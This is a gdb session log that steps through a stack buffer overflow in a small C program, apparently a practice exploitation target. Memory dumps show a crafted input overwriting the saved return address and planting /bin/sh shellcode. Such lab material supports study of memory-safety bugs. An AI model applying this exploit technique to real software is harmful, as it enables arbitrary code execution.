(gdb) print &msg
$1 = (char (*)[128]) 0xbffffb68

Breakpoint 1, main (argc=2, argv=0xbffffcb4) at agent-smith.c:23
23        if (argc != 2)
(gdb) step
26        display(argv[1]);
(gdb) step
display (path=0xbffffdb3 "pwnzerized.txt") at agent-smith.c:9
9         memset(msg, 0, 128);
(gdb) step
11        FILE *file = fopen(path, "r");
(gdb) x/100x $esp
0xbffffb50:     0xbffffb68      0x00000000      0x00000080      0xb7fdcb48
0xbffffb60:     0x00000001      0x00000000      0x00000000      0x00000000
0xbffffb70:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb80:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb90:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffba0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbb0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbc0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbd0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbe0:     0x00000000      0x00000000      0x0804a000      0x080485e2
0xbffffbf0:     0x00000002      0xbffffcb4      0xbffffc18      0x0804857b
0xbffffc00:     0xbffffdb3      0x00000000      0x08048599      0xb7fd2000
0xbffffc10:     0x08048590      0x00000000      0x00000000      0xb7e454d3
0xbffffc20:     0x00000002      0xbffffcb4      0xbffffcc0      0xb7fdc858
0xbffffc30:     0x00000000      0xbffffc1c      0xbffffcc0      0x00000000
0xbffffc40:     0x0804824c      0xb7fd2000      0x00000000      0x00000000
0xbffffc50:     0x00000000      0x8fdcc8f4      0xb88dace4      0x00000000
0xbffffc60:     0x00000000      0x00000000      0x00000002      0x080483c0
0xbffffc70:     0x00000000      0xb7ff26a0      0xb7e453e9      0xb7fff000
0xbffffc80:     0x00000002      0x080483c0      0x00000000      0x080483e1
0xbffffc90:     0x08048555      0x00000002      0xbffffcb4      0x08048590
0xbffffca0:     0x08048600      0xb7fed270      0xbffffcac      0xb7fff938
0xbffffcb0:     0x00000002      0xbffffd9b      0xbffffdb3      0x00000000
0xbffffcc0:     0xbffffdc2      0xbfffffc8      0xbfffffd4      0x00000000
---Type <return> to continue, or q <return> to quit---<return>
0xbffffcd0:     0x00000020      0xb7fdd414      0x00000021      0xb7fdd000
(gdb) info frame
Stack level 0, frame at 0xbffffc00:
 eip = 0x80484d3 in display (agent-smith.c:11); saved eip 0x804857b
 called by frame at 0xbffffc20
 source language c.
 Arglist at 0xbffffbf8, args: path=0xbffffdb3 "pwnzerized.txt"
 Locals at 0xbffffbf8, Previous frame's sp is 0xbffffc00
 Saved registers:
  ebp at 0xbffffbf8, eip at 0xbffffbfc
(gdb) step
12        size_t n = fread(&size, 1, 1, file);
(gdb) step
13        if (n == 0 || size > 128)
(gdb) step
15        n = fread(msg, 1, size, file);
(gdb) step
17        puts(msg);
(gdb) step
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF▒
18      }
(gdb) x/100x $esp
0xbffffb50:     0xbffffb68      0x00000001      0xffffffff      0x0804b008
0xbffffb60:     0x00000001      0xff000000      0x46464646      0x46464646
0xbffffb70:     0x46464646      0x46464646      0x46464646      0x46464646
0xbffffb80:     0x46464646      0x46464646      0x46464646      0x46464646
0xbffffb90:     0x46464646      0x46464646      0x46464646      0x46464646
0xbffffba0:     0x46464646      0x46464646      0x46464646      0x46464646
0xbffffbb0:     0x46464646      0x46464646      0x46464646      0x46464646
0xbffffbc0:     0x46464646      0x46464646      0x46464646      0x46464646
0xbffffbd0:     0x46464646      0x46464646      0x46464646      0x46464646
0xbffffbe0:     0x46464646      0x46464646      0x000000c6      0x46464646
0xbffffbf0:     0x46464646      0x46464646      0x46464646      0xbffffc00
0xbffffc00:     0x895e1feb      0xc0310876      0x89074688      0x0bb00c46
0xbffffc10:     0x4e8df389      0x0c568d08      0xdb3180cd      0xcd40d889
0xbffffc20:     0xffdce880      0x622fffff      0x732f6e69      0xb7fd0a68
0xbffffc30:     0x00000000      0xbffffc1c      0xbffffcc0      0x00000000
0xbffffc40:     0x0804824c      0xb7fd2000      0x00000000      0x00000000
0xbffffc50:     0x00000000      0x8fdcc8f4      0xb88dace4      0x00000000
0xbffffc60:     0x00000000      0x00000000      0x00000002      0x080483c0
0xbffffc70:     0x00000000      0xb7ff26a0      0xb7e453e9      0xb7fff000
0xbffffc80:     0x00000002      0x080483c0      0x00000000      0x080483e1
0xbffffc90:     0x08048555      0x00000002      0xbffffcb4      0x08048590
0xbffffca0:     0x08048600      0xb7fed270      0xbffffcac      0xb7fff938
0xbffffcb0:     0x00000002      0xbffffd9b      0xbffffdb3      0x00000000
0xbffffcc0:     0xbffffdc2      0xbfffffc8      0xbfffffd4      0x00000000
